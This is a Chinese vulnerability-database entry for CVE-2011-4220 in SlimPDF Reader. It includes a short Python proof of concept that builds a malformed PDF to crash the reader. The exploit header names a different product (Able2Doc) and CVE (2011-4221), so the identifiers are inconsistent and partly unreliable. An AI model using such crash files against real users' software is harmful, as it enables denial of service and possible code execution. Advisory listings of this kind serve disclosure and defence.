Investintech.com SlimPDF Reader 拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1121210 漏洞类型 权限许可和访问控制
发布时间 2012-06-25 更新时间 2012-06-25
CVE编号 CVE-2011-4220 CNNVD-ID CNNVD-201111-008
漏洞平台 Windows CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/19393
https://cxsecurity.com/issue/WLB-2012060304
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201111-008
|漏洞详情
Investintech.comSlimPDFReader中存在漏洞。由于不能正确限制未明函数调用的参数,远程攻击者可借助特制的PDF文档导致拒绝服务(应用程序崩溃)或者可能执行任意代码。
|漏洞EXP
# Exploit Title: Able2Doc and Able2Doc Professional v 6.0 memory corruption
# Date: June 24 2012
# Exploit Author: Carlos Mario Penagos Hollmann
# Vendor Homepage: www.investintech.com
# Version:6.0
# Tested on: Windows 7
# CVE : cve-2011-4221


payload ="B"*13000
crash="startxref"
pdf=payload+crash

filename = "slimpdPoC.pdf"
file = open(filename,"w")
file.writelines(pdf)
file.close()
|参考资料

来源:US-CERTVulnerabilityNote:VU#275036
名称:VU#275036
链接:http://www.kb.cert.org/vuls/id/275036
来源:NSFOCUS
名称:18122
链接:http://www.nsfocus.net/vulndb/18122